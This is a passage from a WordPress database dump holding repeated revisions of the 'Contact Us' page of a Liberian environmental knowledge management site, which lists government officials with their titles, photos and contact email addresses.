https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:18:14','2021-01-18 13:18:14','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3360,42,'2021-01-18 13:35:13','2021-01-18 13:35:13','','kumeh','','inherit','open','closed','','kumeh','','','2021-01-18 13:35:13','2021-01-18 13:35:13','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png',0,'attachment','image/png',0),(3361,42,'2021-01-18 13:36:26','2021-01-18 13:36:26','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:36:26','2021-01-18 13:36:26','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3362,42,'2021-01-18 13:36:26','2021-01-18 13:36:26','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:36:26','2021-01-18 13:36:26','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3363,42,'2021-01-18 13:36:26','2021-01-18 13:36:26','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" 